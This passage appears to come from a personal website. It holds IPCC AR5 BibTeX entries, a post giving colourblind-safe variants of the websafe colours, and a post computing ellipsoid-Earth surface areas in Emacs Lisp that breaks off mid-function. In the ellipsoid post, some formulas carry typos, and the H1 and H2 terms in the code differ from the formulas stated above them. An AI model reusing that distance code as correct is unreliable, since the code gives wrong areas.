   author = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Alexander, L.V. and Allen, S.K. and Bindoff, N.L. and Bréon, F.-M. and Church, J.A. and Cubasch, U. and Emori, S. and Forster, P. and Friedlingstein, P. and Gillett, N. and Gregory, J.M. and Hartmann, D.L. and Jansen, E. and Kirtman, B. and Knutti, R. and Krishna Kumar, K. and Lemke, P. and Marotzke, J. and Masson-Delmotte, V. and Meehl, G.A. and Mokhov, I.I. and Piao, S. and Ramaswamy, V. and Randall, D. and Rhein, M. and Rojas, M. and Sabine, C. and Shindell, D. and Talley, L.D. and Vaughan, D.G. and Xie, S.-P.},
   title = {Technical Summary},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {TS},
   pages = {33–115},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.005},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCIntroductionCubash2013,
   author = {Cubasch, U. and Wuebbles, D. and Chen, D. and Facchini, M.C. and Frame, D. and Mahowald, N. and Winther, J.-G.},
   title = {Introduction},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {1},
   pages = {119–158},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.007},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCObservationsAtmosphereSurfaceHartmann2013,
   author = {Hartmann, D.L. and Klein Tank, A.M.G. and Rusticucci, M. and Alexander, L.V. and Br\"onnimann, S. and Charabi, Y. and Dentener, F.J. and Dlugokencky, E.J. and Easterling, D.R. and Kaplan, A. and Soden, B.J. and Thorne, P.W. and Wild, M. and Zhai, P.M.},
   title = {Observations: Atmosphere and Surface},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {2},
   pages = {159–254},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.008},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCObservationsOceanRhein2013,
   author = {Rhein, M. and Rintoul, S.R. and Aoki, S. and Campos, E. and Chambers, D. and Feely, R.A. and Gulev, S. and Johnson, G.C. and Josey, S.A. and Kostianoy, A. and Mauritzen, C. and Roemmich, D. and Talley, L.D. and Wang, F.},
   title = {Observations: Ocean},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {3},
   pages = {255–316},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.010},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCObservationsCryosphereVaughan2013,
   author = {Vaughan, D.G. and Comiso, J.C. and Allison, I. and Carrasco, J. and Kaser, G. and Kwok, R. and Mote, P. and Murray, T. and Paul, F. and Ren, J. and Rignot, E. and Solomina, O. and Steffen, K. and Zhang, T.},
   title = {Observations: Cryosphere},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {4},
   pages = {317–382},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.012},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCPaleoclimateArchivesMasson-Delmotte2013,
   author = {Masson-Delmotte, V. and Schulz, M. and Abe-Ouchi, A. and Beer, J. and Ganopolski, A. and González Rouco, J.F. and Jansen, E. and Lambeck, K. and Luterbacher, J. and Naish, T. and Osborn, T. and Otto-Bliesner, B. and Quinn, T. and Ramesh, R. and Rojas, M. and Shao, X. and Timmermann, A.},
   title = {Information from Paleoclimate Archives},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {5},
   pages = {383–464},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.013},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCCarbonCycleAndOthersCiais2013,
   author = {Ciais, P. and Sabine, C. and Bala, G. and Bopp, L. and Brovkin, V. and Canadell, J. and Chhabra, A. and DeFries, R. and Galloway, J. and Heimann, M. and Jones, C. and Le Quéré, C. and Myneni, R.B. and Piao, S. and Thornton, P.},
   title = {Carbon and Other Biogeochemical Cycles},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {6},
   pages = {465–570},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.015},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCCloudsAeorosolsBoucher2013,
   author = {Boucher, O. and Randall, D. and Artaxo, P. and Bretherton, C. and Feingold, G. and Forster, P. and Kerminen, V.-M. and Kondo, Y. and Liao, H. and Lohmann, U. and Rasch, P. and Satheesh, S.K. and Sherwood, S. and Stevens, B. and Zhang, X.Y.},
   title = {Clouds and Aerosols},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {7},
   pages = {571–658},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.016},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCRadiativeForcingMyhre2013,
   author = {Myhre, G. and Shindell, D. and Bréon, F.-M. and Collins, W. and Fuglestvedt, J. and Huang, J. and Koch, D. and Lamarque, J.-F. and Lee, D. and Mendoza, B. and Nakajima, T. and Robock, A. and Stephens, G. and Takemura, T. and Zhang, H.},
   title = {Anthropogenic and Natural Radiative Forcing},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {8},
   pages = {659–740},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.018},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCClimateModelsFlato2013,
   author = {Flato, G. and Marotzke, J. and Abiodun, B. and Braconnot, P. and Chou, S.C. and Collins, W. and Cox, P. and Driouech, F. and Emori, S. and Eyring, V. and Forest, C. and Gleckler, P. and Guilyardi, E. and Jakob, C. and Kattsov, V. and Reason, C. and Rummukainen, M.},
   title = {Evaluation of Climate Models},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {9},
   pages = {741–866},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.020},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCDetectionAttributionBindoff2013,
   author = {Bindoff, N.L. and Stott, P.A. and AchutaRao, K.M. and Allen, M.R. and Gillett, N. and Gutzler, D. and Hansingo, K. and Hegerl, G. and Hu, Y. and Jain, S. and Mokhov, I.I. and Overland, J. and Perlwitz, J. and Sebbari, R. and Zhang, X.},
   title = {Detection and Attribution of Climate Change: from Global to Regional},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {10},
   pages = {867–952},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.022},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCNeartermProjectionsKirtman2013,
   author = {Kirtman, B. and Power, S.B. and Adedoyin, J.A. and Boer, G.J. and Bojariu, R. and Camilloni, I. and Doblas-Reyes, F.J. and Fiore, A.M. and Kimoto, M. and Meehl, G.A. and Prather, M. and Sarr, A. and Schär, C. and Sutton, R. and van Oldenborgh, G.J. and Vecchi, G. and Wang, H.J.},
   title = {Near-term Climate Change: Projections and Predictability},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {11},
   pages = {953–1028},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.023},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCLongtermProjectionsCollins2013,
   author = {Collins, M. and Knutti, R. and Arblaster, J. and Dufresne, J.-L. and Fichefet, T. and Friedlingstein, P. and Gao, X. and Gutowski, W.J. and Johns, T. and Krinner, G. and Shongwe, M. and Tebaldi, C. and Weaver, A.J. and Wehner, M.},
   title = {Long-term Climate Change: Projections, Commitments and Irreversibility},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {12},
   pages = {1029–1136},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.024},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCSeaLevelChurch2013,
   author = {Church, J.A. and Clark, P.U. and Cazenave, A. and Gregory, J.M. and Jevrejeva, S. and Levermann, A. and Merrifield, M.A. and Milne, G.A. and Nerem, R.S. and Nunn, P.D. and Payne, A.J. and Pfeffer, W.T. and Stammer, D. and Unnikrishnan, A.S.},
   title = {Sea Level Change},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {13},
   pages = {1137–1216},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.026},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCClimatePhenomenaChristensen2013,
   author = {Christensen, J.H. and Krishna Kumar, K. and Aldrian, E. and An, S.-I. and Cavalcanti, I.F.A. and de Castro, M. and Dong, W. and Goswami, P. and Hall, A. and Kanyanga, J.K. and Kitoh, A. and Kossin, J. and Lau, N.-C. and Renwick, J. and Stephenson, D.B. and Xie, S.-P. and Zhou, T.},
   title = {Climate Phenomena and their Relevance for Future Regional Climate Change},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {14},
   pages = {1217–1308},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.028},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex1projectionsStocker2013,
   author = {IPCC},
   title = {Annex I: Atlas of Global and Regional Climate Projections },
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AI},
   pages = {1311–1394},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.029},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex2scenariosStocker2013,
   author = {IPCC},
   title = {Annex II: Climate System Scenario Tables },
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AII},
   pages = {1395–1446},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.030},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex3glossaryStocker2013,
   author = {IPCC},
   title = {Annex III: Glossary},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AIII},
   pages = {1447–1466},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.031},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex4acronymsStocker2013,
   author = {IPCC},
   title = {Annex IV: Acronyms},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AIV},
   pages = {1467–1476},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex5contributorsStocker2013,
   author = {IPCC},
   title = {Annex V: Contributors to the IPCC WGI Fifth Assessment Report},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AV},
   pages = {1477–1496},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCannex6reviewersStocker2013,
   author = {IPCC},
   title = {Annex VI: Expert Reviewers of the IPCC WGI Fifth Assessment Report},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {AVI},
   pages = {1497–1522},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCIndexStocker2013,
   author = {IPCC},
   title = {Index},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {Index},
   pages = {1523–1535},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

  1. In IPCC 2013 WG1 they finally provide bibtex in their zip of references, but without item headers — you can’t use these directly. 

Making websafe colors safe for colorblind people

I just made the colors of my plotting framework safe for colorblind people (thanks to Paul Tol’s notes) and I want to share a very nice result I got: How to make the really websafe colors safe for colorblind people with minimal changes.

mostly websafe and colorblindsafe websafe but NOT colorblind safe

(the colorblind-safe colors are on the left, the original websafe colors on the right)

To do so, I turned to Color Oracle (for simulation of colorblindness directly on my screen) and Emacs rainbow-mode (for seeing the colors while editing the hex-codes - as shown in the screenshots above) and tweaked the color codes bit by bit, until they were distinguishable in the simulation of Deuteranopia, Protanopia and Tritanopia.

The result were the following colorcodes:

silver#c0c0c0
gray#808080
black#000000
red#ff0000
maroon#800000
yellow#ffff00
olive#707030
lime#00ee00
green#009000
aqua#00eeee
teal#00a0a0
blue#0000ff
navy#000080
fuchsia#ff00ff
purple#900090

The changes in detail:

- olive = "#808000"
+ olive = "#707030"

- lime = "#00ff00"
+ lime = "#00ee00"

- aqua = "#00ffff"
+ aqua = "#00eeee"

- green = "#008000"
+ green = "#009000"

- teal = "#008080"
+ teal = "#00a0a0"

- purple = "#800080"
+ purple = "#900090"

Unchanged colors: Silver, Gray, Black, Red, Maroon, Yellow, Blue, Navy, Fuchsia (and naturally White).

Caveeat: Naturally this change makes the colors less websafe, but they still stay close to their counterparts, so simple designs which use these colors can be adjusted without disrupting the visual appearance. Also this change provides a nice, small rainbow-color palette which works for colorblind people. I use it for coloring lines and symbols in plots. Being not safe for colorblind people is a sad design failure of the websafe colors - and as such of displays in general - because as I show in this article, a small adjustment to the colors would have made them safe for colorblind people. In an ideal world, the browser-developers would now come together and decide on a standard for display of these colors, so that they also become completely websafe. In the non-ideal world we live in, I’ll just specify the colors by hexcode, because accessibility trumps design.

Disclaimer: I’m not a usability or accessibility expert. I just do what I can to make my works accessible to people. If you find errors in this article or want to suggest improvements, please contact me.

AnhangGröße
websafe-colorblind-safe.png14.65 KB
websafe-not-colorblindsafe.png14.51 KB

Surface Area of regions on an ellipsoid Earth

PDF

PDF (to print)

Org (source)

Data (netCDF4)

Calculating the area of arbitrary regions on the Earth approximated as an ellipsoid. I needed this for conversion between the output of different models.

It’s calculated in Emacs Lisp, which showed me that for somewhat complex mathematical tasks Lisp syntax isn’t only unproblematic, but actually helps avoiding mistakes. And full unicode support is great for implementing algorithms with ω, λ and φ.

eartharea_1x1.png

1 Intro

For converting between fluxes and emissions I need the area of arbitrary regions made up of longitude×latitude pixels - specifically the transcom regions.

But the earth is no exact sphere, but rather an oblate spheroid. I need to estimate how exact I have to calculate to keep the representation errors of the regions insignificant compared to the uncertainties of the fluxes I work with.

2 Theory

http://de.wikipedia.org/wiki/Erdfigur http://de.wikipedia.org/wiki/Erdellipsoid

„Dadurch nimmt der Meeresspiegel genähert die Form eines Rotationsellipsoids an, dessen Halbachsen (Radien) sich um 21,38 km unterscheiden (a = 6378,139 ± 0,003 km ⁽¹⁾, bzw. b = 6356,752 km)“

\begin{equation} f = \frac{a-b}{a} = 1:298.25642 \pm 0.00001 \end{equation}

IERS Conventions (2003).

2.1 Estimating Errors due to spherical approximation

To estimate the errors, just calculate the area of a few samples with different latitude and compare them.

Latitudes

  • lat 0°
  • lat 10°
  • lat 30°
  • lat 60°
  • lat 85°

Area-Sidelength:

  • 0.1°

2.1.1 Spherical

The simplest case for the latitude-longitude rectangle with latitude theta, longitude phi and earth radius \( R \) looks in linear approximation like this:

segmentsphere.png

Using a cylindrical equal area rectangle projection (Lambert) we can calculate the area of a given latitude-longitude square as follows:

With θ as longitude, φ as latitude and \( R \) as radius of the earth sphere.

For a 1°×1° square, that equals

(defun spherecutarea (latdeg sidelength deglen)
  "Calculate the area of a cut in a sphere at the latitude LATDEG
with the given SIDELENGTH and the length of one degree at the
Equator DEGLEN."
  (* deglen sidelength ; longitude 
     deglen sidelength (cos (* 2 float-pi (/ latdeg 360.0))))) ; latitude

(defun spherearea (latdeg sidelength)
  "Area of a segment of a sphere at LATDEG with the given
SIDELENGTH."
  (let* ((R 6371.0) ; km
         (deglen (/ (* 2 float-pi R) 360.0))) ; km^2
    (spherecutarea latdeg sidelength deglen)))
Table 1: Area of lat-lon “square” with the given sidelength as degree in \(km^2\)
latitude ↓ 0.1 1 4
0 123.64 12364.31 197828.99
10 121.76 12176.47 194823.52
30 107.08 10707.81 171324.93
60 61.82 6182.16 98914.49
85 10.78 1077.62 17241.93
(defun spheresegmentarea (latdeg sidelength)
  "Calculate the area of a rectangular segment on a sphere at
latitude LATDEG with the given SIDELENGTH."
  (* 24728.6234228 sidelength sidelength 
     (cos (* float-pi (/ latdeg 180.0)))))
spheresegmentarea

2.2 Simple ellipsoid integral (scrapped)

Instead of the very simple spherical compression, we can use integration over the area of an oblated spheroid, or more exactly: an ellipsoid of revolution.

An oblated spheroid has one short axis and two long axi. For the earth, the short axis is the polar radius \( b = 6356,752 km \) while the long axi have the length of the equatorial radius \( a = a = 6378,139 ± 0,003 km \).

Thus the linear approximation of an area on the spheroid looks like this:

segmentellipsoid.png

Let’s scrap that. I’m drowning in not-so-simple ideas, so I’d rather take a pre-generated formula, even if it means cutting leafs with a chainsaw. Let’s go to an astronomy book: Astronomische Algorithmen by Jean Meeus has a formula for distances on an ellipsoid.

2.3 Square approximation with ellipsoid sidelength calculation

Taking the algorithm from Astronomische Algorithmen rev. 2 by Jean Meeus. I want to know how big the errors are when I just take a circle. So let’s implement a fitting algorithm.

The following algorithm gives us the distance between two points.

\begin{equation} F = \frac{\phi_1 + \phi_2}{2}, G = \frac{\phi_1 - \phi_2}{2}, \lambda = \frac{L_1 - L_2}{2} \end{equation} \begin{equation} S = sin^2 G ~ cos^2 G + cos^2 F ~ sin^2 \lambda \end{equation} \begin{equation} C = cos^2 G ~ cos^2 G + sin^2 F ~ sin^2 \lambda \end{equation} \begin{equation} tan \omega = \sqrt{\frac{S}{C}} \end{equation} \begin{equation} R = \frac{\sqrt{SC}}{\omega} , ~ omega ~ in ~ radians \end{equation} \begin{equation} D = 2 \omega a \end{equation} \begin{equation} H_1 = \frac{3R - 1}{2C}, H_2 = \frac{3R + 2}{2S} \end{equation} \begin{equation} s = D(1 + fH_1 ~ sin^2 F ~ cos^2 G - fH_2 ~ cos^2 F ~ sin^2 G) \end{equation}

We can now use the distance \( s \) between the 4 corners of a pseudo-rectangular area on the ellipsoid to approximate the area of the pseudo-square they delimit.

\begin{equation} A = \frac{s_{bottomright - bottomleft} + s_{topright - topleft}}{2} \cdot s_{topleft - bottomleft} \end{equation}

segmentellipsoiddistances.png

But by doing so we treat the non-linear problem as linear. To minimize the error, we can split an area into many smaller areas and sum up their areas (numerical approximation).

In following we will use the direct algorithm as well as the numerical approximation.

2.3.1 Code

(defmacro turntofloatsingle (var)
  (list 'setq var (list 'float var)))

(defmacro turntofloat (&rest vars)
  "Turn a list of items to floats."
  (cons 'progn (mapcar 
                (lambda (var) 
                  (list 'turntofloatsingle var))
                vars)))
(defun ellipsoiddistance (a f L1 L2 φ1 φ2)
  "Calculate the distance of two arbitrary points on an ellipsoid.

  Parameters: Equator radius A, oblateness F and for point 1 and
  2 respectively the longitudes L1 and L2 and the latitudes φ1
  and φ2."
  ; ensure that we work on floats
  (turntofloat a f φ1 φ2 L1 L2)
  ; the first simplifications don’t depend on each other, 
  ; so we just use let to bind them
  (let ((F (/ (+ φ1 φ2) 2))
        (G (/ (- φ1 φ2) 2))
        (λ (/ (- L1 L2) 2)))
    (message (format "F %f G %f λ %f a %f f %f L1 %f L2 %f φ1 %f φ2 %f" 
                     F G λ a f L1 L2 φ1 φ2))
    ; the second don’t depend on each other either
    (let ((S (+ (* (expt (sin G) 2)
                   (expt (cos λ) 2))
                (* (expt (cos F) 2)
                   (expt (sin λ) 2))))
          (C (+ (* (expt (cos G) 2)
                   (expt (cos λ) 2))        
                (* (expt (sin F) 2)
                   (expt (sin λ) 2)))))
      ; now we have a few consecutive definitions, so we use let*
      ; which allows references to previous elements in the same let*.
      (let* ((ω (atan (sqrt (/ S C))))
             (R (/    (sqrt (* S C)) ω)))
        (let ((D (* 2 ω a))
              (H1 (/ (- (* 3 R)) (* 2 C)))
              (H2 (/ (+ (* 3 R)) (* 2 C))))
          ; All prepared. Now we just fit all this together. This is
          ; the last line, so the function returns the value.
          (* D (- 
                (+ 1 (* f H1 (expt (sin F) 2) (expt (cos G) 2)))
                (* f H2 (expt (cos F) 2) (expt (sin G) 2)))))))))
(defun ellipsoidrectanglearea (a f longitude latitude dlon dlat)
  (let ((L1 longitude)
        (L2 (+ longitude dlon))
        (φ1 latitude)
        (φ2 (+ latitude dlat)))
    (let ((lenlower (ellipsoiddistance a f L1 L2 φ1 φ1))
          (lenupper (ellipsoiddistance a f L1 L2 φ2 φ2))
          (lenwestern (ellipsoiddistance a f L1 L1 φ1 φ2))
          (leneastern (ellipsoiddistance a f L2 L2 φ1 φ2)))
      (if (not (= lenwestern leneastern))
          (error "Western and Eastern length are not equal. 
This violates the laws of geometry. We die. Western: %f Eastern: %f" 
                 lenwestern leneastern))
      (let ((horizontalmean (/ (+ lenlower lenupper) 2)))
        ; now just return length times width
        (* horizontalmean lenwestern)))))
<<ellipsoid-helpers>>
<<ellipsoid-distance>>
<<ellipsoid-rectanglearea>>

(defun ellipsoidrectangleareafromdeg (latdeg sidelength)
  "Calculate the rectangle area from the latitude LATDEG and the
SIDELENGTH given as degrees."
  (message (format "latdeg %f sidelength %f" latdeg sidelength))
  (let ((londeg 15) ; irrelevant due to symmetry
        (dlondeg sidelength)
        (dlatdeg sidelength)
        (a 6378.139)
        (f (/ 1 298.25642)))
    (let ((lon (* 2 float-pi (/ londeg 360.0))) ; 2π / 360
          (dlon (* 2 float-pi (/ dlondeg 360.0)))
          (lat (* 2 float-pi (/ latdeg 360.0))) 
          (dlat (* 2 float-pi (/ dlatdeg 360.0))))
